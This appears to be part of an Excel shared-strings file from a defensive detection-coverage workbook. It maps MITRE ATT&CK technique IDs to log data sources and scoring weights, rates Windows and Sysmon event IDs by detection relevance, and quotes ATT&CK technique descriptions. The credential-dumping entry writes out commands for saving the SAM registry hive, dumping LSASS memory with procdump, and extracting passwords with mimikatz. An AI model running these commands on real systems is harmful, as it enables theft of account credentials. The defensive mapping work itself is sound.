  </si>
  <si>
    <t>65;35</t>
  </si>
  <si>
    <t>T1079</t>
  </si>
  <si>
    <t>35;35;15;15</t>
  </si>
  <si>
    <t>T1080</t>
  </si>
  <si>
    <t>T1081</t>
  </si>
  <si>
    <t>T1082</t>
  </si>
  <si>
    <t>T1083</t>
  </si>
  <si>
    <t>T1084</t>
  </si>
  <si>
    <t>T1085</t>
  </si>
  <si>
    <t>15;25;40;20</t>
  </si>
  <si>
    <t>T1086</t>
  </si>
  <si>
    <t>20;15;30;35</t>
  </si>
  <si>
    <t>T1087</t>
  </si>
  <si>
    <t>T1088</t>
  </si>
  <si>
    <t>25;20;35;20</t>
  </si>
  <si>
    <t>T1089</t>
  </si>
  <si>
    <t>20;10;20;15;20;15</t>
  </si>
  <si>
    <t>T1090</t>
  </si>
  <si>
    <t>30;20;30;20</t>
  </si>
  <si>
    <t>T1091</t>
  </si>
  <si>
    <t>T1092</t>
  </si>
  <si>
    <t>T1093</t>
  </si>
  <si>
    <t>T1094</t>
  </si>
  <si>
    <t>15;20;20;10;10;15;10</t>
  </si>
  <si>
    <t>T1095</t>
  </si>
  <si>
    <t>15;20;20;15;10;20</t>
  </si>
  <si>
    <t>T1096</t>
  </si>
  <si>
    <t>30;10;30;30</t>
  </si>
  <si>
    <t>T1097</t>
  </si>
  <si>
    <t>T1098</t>
  </si>
  <si>
    <t>T1099</t>
  </si>
  <si>
    <t>40;25;35</t>
  </si>
  <si>
    <t>T1100</t>
  </si>
  <si>
    <t>T1101</t>
  </si>
  <si>
    <t>T1102</t>
  </si>
  <si>
    <t>10;25;20;20;25</t>
  </si>
  <si>
    <t>T1103</t>
  </si>
  <si>
    <t>T1104</t>
  </si>
  <si>
    <t>25;15;20;15;25</t>
  </si>
  <si>
    <t>T1105</t>
  </si>
  <si>
    <t>20;10;20;20;15;15</t>
  </si>
  <si>
    <t>T1106</t>
  </si>
  <si>
    <t>T1107</t>
  </si>
  <si>
    <t>40;40;20</t>
  </si>
  <si>
    <t>T1108</t>
  </si>
  <si>
    <t>10;20;10;10;20;20;10</t>
  </si>
  <si>
    <t>T1109</t>
  </si>
  <si>
    <t>10;30;30;30</t>
  </si>
  <si>
    <t>T1110</t>
  </si>
  <si>
    <t>T1111</t>
  </si>
  <si>
    <t>T1112</t>
  </si>
  <si>
    <t>30;15;15;30;30</t>
  </si>
  <si>
    <t>T1113</t>
  </si>
  <si>
    <t>45;30;25</t>
  </si>
  <si>
    <t>T1114</t>
  </si>
  <si>
    <t>35;25;15;25</t>
  </si>
  <si>
    <t>T1115</t>
  </si>
  <si>
    <t>T1116</t>
  </si>
  <si>
    <t>T1117</t>
  </si>
  <si>
    <t>T1118</t>
  </si>
  <si>
    <t>T1119</t>
  </si>
  <si>
    <t>T1120</t>
  </si>
  <si>
    <t>T1121</t>
  </si>
  <si>
    <t>T1122</t>
  </si>
  <si>
    <t>30;35;35</t>
  </si>
  <si>
    <t>T1123</t>
  </si>
  <si>
    <t>T1124</t>
  </si>
  <si>
    <t xml:space="preserve">T1125 </t>
  </si>
  <si>
    <t>T1126</t>
  </si>
  <si>
    <t>25;35;20;30</t>
  </si>
  <si>
    <t>T1127</t>
  </si>
  <si>
    <t>T1128</t>
  </si>
  <si>
    <t>T1129</t>
  </si>
  <si>
    <t>25;30;20;25</t>
  </si>
  <si>
    <t>T1130</t>
  </si>
  <si>
    <t>T1131</t>
  </si>
  <si>
    <t>T1132</t>
  </si>
  <si>
    <t>T1133</t>
  </si>
  <si>
    <t>T1134</t>
  </si>
  <si>
    <t>T1135</t>
  </si>
  <si>
    <t>T1136</t>
  </si>
  <si>
    <t>15;25;30;30</t>
  </si>
  <si>
    <t>T1137</t>
  </si>
  <si>
    <t>T1138</t>
  </si>
  <si>
    <t>T1139</t>
  </si>
  <si>
    <t>T1140</t>
  </si>
  <si>
    <t>20;30;50</t>
  </si>
  <si>
    <t>T1141</t>
  </si>
  <si>
    <t>T1142</t>
  </si>
  <si>
    <t>T1143</t>
  </si>
  <si>
    <t>T1144</t>
  </si>
  <si>
    <t>T1145</t>
  </si>
  <si>
    <t>T1146</t>
  </si>
  <si>
    <t>50;50</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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15;10;20;5;20;15;15</t>
  </si>
  <si>
    <t>T1176</t>
  </si>
  <si>
    <t>10;10;20;20;10;30</t>
  </si>
  <si>
    <t>T1177</t>
  </si>
  <si>
    <t>20;20;10;20;15;15</t>
  </si>
  <si>
    <t>T1178</t>
  </si>
  <si>
    <t>T1179</t>
  </si>
  <si>
    <t>15;10;20;20;20;15</t>
  </si>
  <si>
    <t>T1180</t>
  </si>
  <si>
    <t>T1181</t>
  </si>
  <si>
    <t>T1182</t>
  </si>
  <si>
    <t>T1183</t>
  </si>
  <si>
    <t>T1184</t>
  </si>
  <si>
    <t>T1185</t>
  </si>
  <si>
    <t>30;15;30;25</t>
  </si>
  <si>
    <t>T1186</t>
  </si>
  <si>
    <t>T1187</t>
  </si>
  <si>
    <t>20;25;20;35</t>
  </si>
  <si>
    <t>T1188</t>
  </si>
  <si>
    <t>T1189</t>
  </si>
  <si>
    <t>15;15;15;20;20;15</t>
  </si>
  <si>
    <t>T1190</t>
  </si>
  <si>
    <t>T1191</t>
  </si>
  <si>
    <t>20;30;25;25</t>
  </si>
  <si>
    <t>T1192</t>
  </si>
  <si>
    <t>10;20;20;10;10;15;15</t>
  </si>
  <si>
    <t>T1193</t>
  </si>
  <si>
    <t>10;10;20;20;20;20</t>
  </si>
  <si>
    <t>T1194</t>
  </si>
  <si>
    <t>T1195</t>
  </si>
  <si>
    <t>T1196</t>
  </si>
  <si>
    <t>15;10;15;15;15;15;15</t>
  </si>
  <si>
    <t>T1197</t>
  </si>
  <si>
    <t>T1198</t>
  </si>
  <si>
    <t>T1199</t>
  </si>
  <si>
    <t>T1200</t>
  </si>
  <si>
    <t>T1201</t>
  </si>
  <si>
    <t>T1202</t>
  </si>
  <si>
    <t>T1203</t>
  </si>
  <si>
    <t>T1204</t>
  </si>
  <si>
    <t>T1205</t>
  </si>
  <si>
    <t>T1206</t>
  </si>
  <si>
    <t>T1207</t>
  </si>
  <si>
    <t>25;35;20;20</t>
  </si>
  <si>
    <t>T1208</t>
  </si>
  <si>
    <t>T1209</t>
  </si>
  <si>
    <t>20;10;20;10;20;20</t>
  </si>
  <si>
    <t>T1210</t>
  </si>
  <si>
    <t>T1211</t>
  </si>
  <si>
    <t>T1212</t>
  </si>
  <si>
    <t>T1213</t>
  </si>
  <si>
    <t>T1214</t>
  </si>
  <si>
    <t>T1215</t>
  </si>
  <si>
    <t>T1216</t>
  </si>
  <si>
    <t>T1217</t>
  </si>
  <si>
    <t>T1218</t>
  </si>
  <si>
    <t>T1219</t>
  </si>
  <si>
    <t>T1220</t>
  </si>
  <si>
    <t>T1221</t>
  </si>
  <si>
    <t>T1222</t>
  </si>
  <si>
    <t>T1223</t>
  </si>
  <si>
    <t>Rating Legend</t>
  </si>
  <si>
    <t>Per event</t>
  </si>
  <si>
    <t>Completeness</t>
  </si>
  <si>
    <t>number, min 0 max 5</t>
  </si>
  <si>
    <t>The amount of systems that have this event type available out of the total amount of systems that could be able to have it</t>
  </si>
  <si>
    <t>Timeliness</t>
  </si>
  <si>
    <t>Hours = 1, under 30 minutes = 3, under 5 minutes to real-time = 5</t>
  </si>
  <si>
    <t>Availability</t>
  </si>
  <si>
    <t>Not available = 0, Locally available = 2, Centrally available = 5</t>
  </si>
  <si>
    <t>Per datasource</t>
  </si>
  <si>
    <t>0 - 100</t>
  </si>
  <si>
    <r>
      <t xml:space="preserve">It should add up to 100 per </t>
    </r>
    <r>
      <rPr>
        <b/>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>DataSource</t>
    </r>
    <r>
      <rPr>
        <sz val="9"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
        <scheme val="minor"/>
      </rPr>
      <t>, separated by a ;</t>
    </r>
  </si>
  <si>
    <t>The total amount of DataSources per technique needs to be equal to the amount of weights</t>
  </si>
  <si>
    <t>EventID</t>
  </si>
  <si>
    <t>Event Description</t>
  </si>
  <si>
    <t>Log Name</t>
  </si>
  <si>
    <t>Verbosity Signal</t>
  </si>
  <si>
    <t>Detection Relevance</t>
  </si>
  <si>
    <t>Process creation</t>
  </si>
  <si>
    <t>Microsoft-Windows-Sysmon/Operational</t>
  </si>
  <si>
    <t>Medium</t>
  </si>
  <si>
    <t>High</t>
  </si>
  <si>
    <t>A process changed a file creation time</t>
  </si>
  <si>
    <t>Low</t>
  </si>
  <si>
    <t>Network connection</t>
  </si>
  <si>
    <t>Sysmon service state changed</t>
  </si>
  <si>
    <t>Process terminated</t>
  </si>
  <si>
    <t>Driver loaded</t>
  </si>
  <si>
    <t>WSMan session initialized</t>
  </si>
  <si>
    <t>Microsoft-Windows-WinRM/Operational</t>
  </si>
  <si>
    <t>Image loaded</t>
  </si>
  <si>
    <t>CreateRemoteThread</t>
  </si>
  <si>
    <t>WSMan session de-initialized</t>
  </si>
  <si>
    <t>RawAccessRead</t>
  </si>
  <si>
    <t>ProcessAccess</t>
  </si>
  <si>
    <t>FileCreate</t>
  </si>
  <si>
    <t>RegistryEvent (Value Set)</t>
  </si>
  <si>
    <t>RegistryEvent (Key and Value Rename)</t>
  </si>
  <si>
    <t>FileCreateStreamHash</t>
  </si>
  <si>
    <t>Sysmon Config State Changed</t>
  </si>
  <si>
    <t>PipeEvent - Pipe Created</t>
  </si>
  <si>
    <t>PipeEvent - Pipe Connected</t>
  </si>
  <si>
    <t>WmiEvent - WmiEventFilter activity detected</t>
  </si>
  <si>
    <t>WmiEvent - WmiEventConsumer activity detected</t>
  </si>
  <si>
    <t>WmiEvent - WmiEventConsumerToFilter activity detected</t>
  </si>
  <si>
    <t>RDP source IP / logon user name</t>
  </si>
  <si>
    <t>Microsoft-Windows-TerminalServices-LocalSessionManager/Operational</t>
  </si>
  <si>
    <t>RDP logon user name</t>
  </si>
  <si>
    <t>WinRM session creation</t>
  </si>
  <si>
    <t>RDP connection attempt with source IP / logon user name</t>
  </si>
  <si>
    <t>Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Operational</t>
  </si>
  <si>
    <t>The System log file was cleared (covers sysmon logs deletion)</t>
  </si>
  <si>
    <t>System</t>
  </si>
  <si>
    <t>Very High</t>
  </si>
  <si>
    <t>Scheduled task created</t>
  </si>
  <si>
    <t>Microsoft-Windows-TaskScheduler/Maintenance</t>
  </si>
  <si>
    <t>RDP successful connection</t>
  </si>
  <si>
    <t>Scheduled task updated</t>
  </si>
  <si>
    <t>Scheduled task deleted</t>
  </si>
  <si>
    <t>WinRM authenticating user</t>
  </si>
  <si>
    <t>Scheduled task executed</t>
  </si>
  <si>
    <t>Scheduled task completed</t>
  </si>
  <si>
    <t>Lookup: Query received</t>
  </si>
  <si>
    <t>DNS analytic logs</t>
  </si>
  <si>
    <t>Lookup: Response success</t>
  </si>
  <si>
    <t>Recursive query: Response in</t>
  </si>
  <si>
    <t>Engine Lifecycle - Start</t>
  </si>
  <si>
    <t>Windows PowerShell</t>
  </si>
  <si>
    <t>Engine Lifecycle - Stopped</t>
  </si>
  <si>
    <t>Provider Lifecycle</t>
  </si>
  <si>
    <t>Detected Malware</t>
  </si>
  <si>
    <t>Microsoft-Windows-Windows Defender/Operational</t>
  </si>
  <si>
    <t>Action on Malware failed</t>
  </si>
  <si>
    <t>The event logging service has shut down</t>
  </si>
  <si>
    <t>The audit log was cleared (Security)</t>
  </si>
  <si>
    <t>Security</t>
  </si>
  <si>
    <t>Windows Defender Antivirus has detected malware or other potentially unwanted software.</t>
  </si>
  <si>
    <t>Windows Defender Antivirus has taken action to protect this machine from malware or other potentially unwanted software.</t>
  </si>
  <si>
    <t>A rule has been added to the Windows Firewall exception list.</t>
  </si>
  <si>
    <t>Microsoft-Windows-Windows Firewall With Advanced Security/Firewall</t>
  </si>
  <si>
    <t>A rule has been modified in the Windows Firewall exception list.</t>
  </si>
  <si>
    <t>A rule has been deleted in the Windows Firewall exception list.</t>
  </si>
  <si>
    <t>PowerShell Module Logging</t>
  </si>
  <si>
    <t>Microsoft-Windows-PowerShell/Operational</t>
  </si>
  <si>
    <t>PowerShell Script Block Logging (Win 2012R2 and above)</t>
  </si>
  <si>
    <t>The system time was changed</t>
  </si>
  <si>
    <t>An account was successfully logged on</t>
  </si>
  <si>
    <t>An account failed to log on</t>
  </si>
  <si>
    <t>Group membership information (win10, 2016 &amp; 2019)</t>
  </si>
  <si>
    <t>A logon was attempted using explicit credentials</t>
  </si>
  <si>
    <t>A registry value was modified</t>
  </si>
  <si>
    <t>A handle to an object was requested</t>
  </si>
  <si>
    <t>An operation was performed on an object</t>
  </si>
  <si>
    <t>An attempt was made to access an object</t>
  </si>
  <si>
    <t>Special privileges assigned to new logon</t>
  </si>
  <si>
    <t>A new process has been created (enable command line logging, see references column)</t>
  </si>
  <si>
    <t>A service was installed in the system</t>
  </si>
  <si>
    <t>A scheduled task was created</t>
  </si>
  <si>
    <t>A scheduled task was deleted</t>
  </si>
  <si>
    <t>A scheduled task was updated</t>
  </si>
  <si>
    <t>A user account was created</t>
  </si>
  <si>
    <t>A user account was enabled</t>
  </si>
  <si>
    <t>A member was added to a security-enabled global group</t>
  </si>
  <si>
    <t>A member was added to a security-enabled local group</t>
  </si>
  <si>
    <t>A user account was changed</t>
  </si>
  <si>
    <t>A computer account was created</t>
  </si>
  <si>
    <t>A Kerberos authentication ticket (TGT) was requested</t>
  </si>
  <si>
    <t>A Kerberos service ticket was requested.</t>
  </si>
  <si>
    <t>The domain controller attempted to validate the credentials for an account (NTLM)</t>
  </si>
  <si>
    <t>A session was reconnected to a Window Station</t>
  </si>
  <si>
    <t>A security-enabled local group or account membership was enumerated (win10, 2016 &amp; 2019)</t>
  </si>
  <si>
    <t>A user's local group membership was enumerated.</t>
  </si>
  <si>
    <t>Code integrity determined that the image hash of a file is not valid (Kernel Driver Signing)</t>
  </si>
  <si>
    <t>A network share object was accessed</t>
  </si>
  <si>
    <t>High (File Shares, DC)</t>
  </si>
  <si>
    <t>A network share object was added</t>
  </si>
  <si>
    <t>A network share object was checked to see whether client can be granted desired access</t>
  </si>
  <si>
    <t>The Windows Filtering Platform blocked a packet</t>
  </si>
  <si>
    <t>The Windows Filtering Platform has allowed a connection</t>
  </si>
  <si>
    <t>The Windows Filtering Platform has permitted a bind to a local port</t>
  </si>
  <si>
    <t>ActiveScriptEventConsumer provider started</t>
  </si>
  <si>
    <t>Microsoft-Windows-WMI-Activity/Operational</t>
  </si>
  <si>
    <t>Registration of temporary WMI event consumer</t>
  </si>
  <si>
    <t>Registration of permanent WMI event consumer</t>
  </si>
  <si>
    <t>Event log service stopped</t>
  </si>
  <si>
    <t>Code Integrity determined that the page hashes of an image file are not valid (Kernel Driver Signing)</t>
  </si>
  <si>
    <t>Service entered stopped state (event log service, AV service etc.)</t>
  </si>
  <si>
    <t>A service config was changed</t>
  </si>
  <si>
    <t>AppLocker Block</t>
  </si>
  <si>
    <t>Microsoft-Windows-AppLocker/EXE and DLL</t>
  </si>
  <si>
    <t>AppLocker Warning</t>
  </si>
  <si>
    <t>DataSource</t>
  </si>
  <si>
    <t>Event</t>
  </si>
  <si>
    <t>Score</t>
  </si>
  <si>
    <t>Anti-virus</t>
  </si>
  <si>
    <t>TrendMicro</t>
  </si>
  <si>
    <t>Symantec</t>
  </si>
  <si>
    <t>Kaspersky</t>
  </si>
  <si>
    <t>Windows Defender:1116,1117,1006,1008</t>
  </si>
  <si>
    <t>API monitoring</t>
  </si>
  <si>
    <t>Authentication logs</t>
  </si>
  <si>
    <t>Windows:4624</t>
  </si>
  <si>
    <t>Windows:4625</t>
  </si>
  <si>
    <t>Windows:4769</t>
  </si>
  <si>
    <t>Binary file metadata</t>
  </si>
  <si>
    <t>BIOS</t>
  </si>
  <si>
    <t>Data loss prevention</t>
  </si>
  <si>
    <t>Windows:4657</t>
  </si>
  <si>
    <t>Digital Certificate Logs</t>
  </si>
  <si>
    <t>Bro Cert.log</t>
  </si>
  <si>
    <t>DLL monitoring</t>
  </si>
  <si>
    <t>Sysmon:7</t>
  </si>
  <si>
    <t>EFI</t>
  </si>
  <si>
    <t>Environment variable</t>
  </si>
  <si>
    <t>Email gateway</t>
  </si>
  <si>
    <t>File monitoring</t>
  </si>
  <si>
    <t>Windows:4663</t>
  </si>
  <si>
    <t>Sysmon:2</t>
  </si>
  <si>
    <t>Sysmon:11</t>
  </si>
  <si>
    <t>Sysmon:15</t>
  </si>
  <si>
    <t>Windows:5140,5145</t>
  </si>
  <si>
    <t>Host network interface</t>
  </si>
  <si>
    <t>Kernel drivers</t>
  </si>
  <si>
    <t>Sysmon:6</t>
  </si>
  <si>
    <t>Windows:5038,6281</t>
  </si>
  <si>
    <t>Loaded DLLs</t>
  </si>
  <si>
    <t>Malware reverse engineering</t>
  </si>
  <si>
    <t>Cuckoo sandbox</t>
  </si>
  <si>
    <t>Palo Alto:WildFire</t>
  </si>
  <si>
    <t>MBR</t>
  </si>
  <si>
    <t>Netflow/Enclave netflow</t>
  </si>
  <si>
    <t>Network device logs</t>
  </si>
  <si>
    <t>Palo Alto:DeviceLog</t>
  </si>
  <si>
    <t>Network protocol analysis</t>
  </si>
  <si>
    <t>Bro logging</t>
  </si>
  <si>
    <t>PaloAlto:TrafficLog</t>
  </si>
  <si>
    <t>Packet capture</t>
  </si>
  <si>
    <t>Moloch</t>
  </si>
  <si>
    <t>PowerShell logs</t>
  </si>
  <si>
    <t>PowerShell:200-500</t>
  </si>
  <si>
    <t>PowerShell:4100-4104</t>
  </si>
  <si>
    <t>Process command-line parameters</t>
  </si>
  <si>
    <t>Windows:4688</t>
  </si>
  <si>
    <t>Sysmon:1</t>
  </si>
  <si>
    <t>Process monitoring</t>
  </si>
  <si>
    <t>Windows:4689</t>
  </si>
  <si>
    <t>Sysmon:5</t>
  </si>
  <si>
    <t>Sysmon:8</t>
  </si>
  <si>
    <t>Windows Scheduled Tasks:100-200</t>
  </si>
  <si>
    <t>Windows Whitelist:8000-8027</t>
  </si>
  <si>
    <t>Process use of network</t>
  </si>
  <si>
    <t>Windows:5156</t>
  </si>
  <si>
    <t>Sysmon:3</t>
  </si>
  <si>
    <t>Sysmon:17</t>
  </si>
  <si>
    <t>Sysmon:18</t>
  </si>
  <si>
    <t>Sensor health and status</t>
  </si>
  <si>
    <t>Sysmon:4</t>
  </si>
  <si>
    <t>Sysmon:16</t>
  </si>
  <si>
    <t>Windows:6005</t>
  </si>
  <si>
    <t>Windows Defender:1005,1006,1008,1010,2001,2003,2004,3002,5008</t>
  </si>
  <si>
    <t>Windows:1100</t>
  </si>
  <si>
    <t>Services</t>
  </si>
  <si>
    <t>Windows Firewall:2003</t>
  </si>
  <si>
    <t>Windows:7040</t>
  </si>
  <si>
    <t>Windows:7045</t>
  </si>
  <si>
    <t>SSL/TLS inspection</t>
  </si>
  <si>
    <t>Palo Alto:ThreatLog</t>
  </si>
  <si>
    <t>System calls</t>
  </si>
  <si>
    <t>Third-party application logs</t>
  </si>
  <si>
    <t>User interface</t>
  </si>
  <si>
    <t>VBR</t>
  </si>
  <si>
    <t>Windows Error Reporting</t>
  </si>
  <si>
    <t>Windows:1000,1001</t>
  </si>
  <si>
    <t>Windows event logs</t>
  </si>
  <si>
    <t>Windows:4724, 4738,4728,4732</t>
  </si>
  <si>
    <t>Windows:1102</t>
  </si>
  <si>
    <t>Windows Registry</t>
  </si>
  <si>
    <t>Sysmon:12</t>
  </si>
  <si>
    <t>Sysmon:13</t>
  </si>
  <si>
    <t>Sysmon:14</t>
  </si>
  <si>
    <t>WMI Objects</t>
  </si>
  <si>
    <t>Windows WMI:5857,5860,5861</t>
  </si>
  <si>
    <t>Sysmon:19</t>
  </si>
  <si>
    <t>Sysmon:20</t>
  </si>
  <si>
    <t>Sysmon:21</t>
  </si>
  <si>
    <t>Name</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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command-and-control</t>
  </si>
  <si>
    <t>Data Compressed</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Process command-line parameters,Process monitoring</t>
  </si>
  <si>
    <t>Linux,Windows,macOS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</si>
  <si>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 (Citation: Wikipedia File Header Signatures)</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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Credential Dumping</t>
  </si>
  <si>
    <t>API monitoring,Process monitoring,PowerShell logs,Process command-line parameters</t>
  </si>
  <si>
    <t>Windows,Linux,macOS</t>
  </si>
  <si>
    <t>### Windows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</si>
  <si>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
### Windows
#### SAM (Security Accounts Manager)
The SAM is a database file that contains local accounts for the host, typically those found with the ‘net user’ command. To enumerate the SAM database, system level access is required.
A number of tools can be used to retrieve the SAM file through in-memory techniques:
* pwdumpx.exe 
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, the SAM can be extracted from the Registry with [Reg](https://attack.mitre.org/software/S0075):
* &lt;code&gt;reg save HKLM\sam sam&lt;/code&gt;
* &lt;code&gt;reg save HKLM\system system&lt;/code&gt;
Creddump7 can then be used to process the SAM database locally to retrieve hashes. (Citation: GitHub Creddump7)
Notes:
Rid 500 account is the local, in-built administrator.
Rid 501 is the guest account.
User accounts start with a RID of 1,000+.
#### Cached Credentials
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
* pwdumpx.exe 
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes:
Cached credentials for Windows Vista are derived using PBKDF2.
#### Local Security Authority (LSA) Secrets
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
* pwdumpx.exe 
* [gsecdump](https://attack.mitre.org/software/S0008)
* [Mimikatz](https://attack.mitre.org/software/S0002)
* secretsdump.py
Alternatively, reg.exe can be used to extract from the Registry and Creddump7 used to gather the credentials.
Notes:
The passwords extracted by his mechanism are UTF-16 encoded, which means that they are returned in plaintext.
Windows 10 adds protections for LSA Secrets described in Mitigation.
#### NTDS from Domain Controller
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 (Citation: Wikipedia Active Directory)
The following tools and techniques can be used to enumerate the NTDS file and the contents of the entire Active Directory hashes.
* Volume Shadow Copy
* secretsdump.py
* Using the in-built Windows tool, ntdsutil.exe
* Invoke-NinjaCopy
#### Group Policy Preference (GPP) Files
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 (Citation: Microsoft GPP Key) (Citation: SRD GPP)
The following tools and scripts can be used to gather and decrypt the password file from Group Policy Preference XML files:
* Metasploit’s post exploitation module: "post/windows/gather/credentials/gpp"
* Get-GPPPassword (Citation: Obscuresecurity Get-GPPPassword)
* gpprefdecrypt.py
Notes:
On the SYSVOL share, the following can be used to enumerate potential XML files.
dir /s * .xml
#### Service Principal Names (SPNs)
See [Kerberoasting](https://attack.mitre.org/techniques/T1208).
#### Plaintext Credentials
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
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 (Citation: TechNet Blogs Credential Protection)
Kerberos: Preferred for mutual client-server domain authentication in Windows 2000 and later.
CredSSP:  Provides SSO and Network Level Authentication for Remote Desktop Services. (Citation: Microsoft CredSSP)
The following tools can be used to enumerate credentials:
* [Windows Credential Editor](https://attack.mitre.org/software/S0005)
* [Mimikatz](https://attack.mitre.org/software/S0002)
As well as in-memory techniques, the LSASS process memory can be dumped from the target host and analyzed on a local system.
For example, on the target host use procdump:
* &lt;code&gt;procdump -ma lsass.exe lsass_dump&lt;/code&gt;
Locally, mimikatz can be run:
* &lt;code&gt;sekurlsa::Minidump lsassdump.dmp&lt;/code&gt;
* &lt;code&gt;sekurlsa::logonPasswords&lt;/code&gt;
#### DCSync
DCSync is a variation on credential dumping which can be used to acquire sensitive information from a domain controller. Rather than executing recognizable malicious code, the action works by abusing the domain controller's  application programming interface (API) (Citation: Microsoft DRSR Dec 2017) (Citation: Microsoft GetNCCChanges) (Citation: Samba DRSUAPI) (Citation: Wine API samlib.dll) to simulate the replication process from a remote domain controller. Any members of the Administrators, Domain Admins, Enterprise Admin groups or computer accounts on the domain controller are able to run DCSync to pull password data (Citation: ADSecurity Mimikatz DCSync) from Active Directory, which may include current and historical hashes of potentially useful accounts such as KRBTGT and Administrators. The hashes can then in turn be used to create a Golden Ticket for use in [Pass the Ticket](https://attack.mitre.org/techniques/T1097) (Citation: Harmj0y Mimikatz and DCSync) or change an account's password as noted in [Account Manipulation](https://attack.mitre.org/techniques/T1098). (Citation: InsiderThreat ChangeNTLM July 2017) DCSync functionality has been included in the "lsadump" module in Mimikatz. (Citation: GitHub Mimikatz lsadump Module) Lsadump also includes NetSync, which performs DCSync over a legacy replication protocol. (Citation: Microsoft NRPC Dec 2017)
### Linux
#### Proc filesystem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[MimiPenguin](https://attack.mitre.org/software/S0179), an open source tool inspired by [Mimikatz](https://attack.mitre.org/software/S0002). The tool dumps process memory, then harvests passwords and hashes by looking for text strings and regex patterns for how given applications such as Gnome Keyring, sshd, and Apache use memory to store such authentication artifacts.</t>
  </si>
  <si>
    <t>credential-access</t>
  </si>
  <si>
    <t>Winlogon Helper DLL</t>
  </si>
  <si>
    <t>Windows Registry,File monitoring,Process monitoring</t>
  </si>
  <si>
    <t>Windows</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</si>
  <si>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</si>
  <si>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</si>
  <si>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persistence</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Interface](https://attack.mitre.org/techniques/T1059), such as [cmd](https://attack.mitre.org/software/S0106), which has functionality to interact with the file system to gather information. Some adversaries may also use [Automated Collection](https://attack.mitre.org/techniques/T1119) on the local system.</t>
  </si>
  <si>
    <t>collection</t>
  </si>
  <si>
    <t>File System Logical Offsets</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Binary Padding</t>
  </si>
  <si>
    <t>Binary file metadata,File monitoring,Malware reverse engineering</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</si>
  <si>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</si>
  <si>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Some security tools inspect files with static signatures to determine if they are known malicious. Adversaries may add data to files to increase the size beyond what security tools are capable of handling or to change the file hash to avoid hash-based blacklists.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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.
In Mac, this can be done natively with a small [AppleScript](https://attack.mitre.org/techniques/T1155) script.</t>
  </si>
  <si>
    <t>Exfiltration Over Other Network Medium</t>
  </si>
  <si>
    <t>User interface,Process monitoring</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</si>
  <si>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Monitor for and investigate changes to host adapter settings, such as addition and/or replication of communication interfaces.</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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interact with the Windows Registry to gather information about the system, configuration, and installed software.
The Registry contains a significant amount of information about the operating system, configuration, software, and security. (Citation: Wikipedia Windows Registry) Some of the information may help adversaries to further their operation within a network.</t>
  </si>
  <si>
    <t>Port Monitors</t>
  </si>
  <si>
    <t>File monitoring,API monitoring,DLL monitoring,Windows Registry,Process monitoring</t>
  </si>
  <si>
    <t>* Monitor process API calls to  (Citation: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 (Citation: TechNet Autoruns)</t>
  </si>
  <si>
    <t>A port monitor can be set through the  (Citation: AddMonitor)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</si>
  <si>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persistence,privilege-escalation</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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Rootkits are programs that hide the existence of malware by intercepting (i.e., [Hooking](https://attack.mitre.org/techniques/T1179)) and modifying operating system API calls that supply system information. (Citation: Symantec Windows Rootkits) Rootkits or rootkit enabling functionality may reside at the user or kernel level in the operating system or lower, to include a [Hypervisor](https://attack.mitre.org/techniques/T1062), Master Boot Record, or the [System Firmware](https://attack.mitre.org/techniques/T1019). (Citation: Wikipedia Rootkit)
Adversaries may use rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits have been seen for Windows, Linux, and Mac OS X systems. (Citation: CrowdStrike Linux Rootkit) (Citation: BlackHat Mac OSX Rootkit)</t>
  </si>
  <si>
    <t>Accessibility Features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</si>
  <si>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</si>
  <si>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 (Citation: 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Protocol](https://attack.mitre.org/techniques/T1076) will cause the replaced file to be executed with SYSTEM privileges. (Citation: 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 (Citation: Tilbury 2014)
Other accessibility features exist that may also be leveraged in a similar fashion: (Citation: DEFCON2016 Sticky Keys)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</si>
  <si>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</si>
  <si>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</si>
  <si>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t>
  </si>
  <si>
    <t>Application Deployment Software</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</si>
  <si>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</si>
  <si>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</si>
  <si>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</si>
  <si>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lateral-movement</t>
  </si>
  <si>
    <t>Remote System Discovery</t>
  </si>
  <si>
    <t>Network protocol analysis,Process monitoring,Process use of network,Process command-line parameters</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</si>
  <si>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</si>
  <si>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Adversaries may also use local host files in order to discover the hostname to IP address mappings of remote systems. 
### Windows
Examples of tools and commands that acquire this information include "ping" or "net view" using [Net](https://attack.mitre.org/software/S0039). The contents of the &lt;code&gt;C:\Windows\System32\Drivers\etc\hosts&lt;/code&gt; file can be viewed to gain insight into the existing hostname to IP mappings on the system.
### Mac
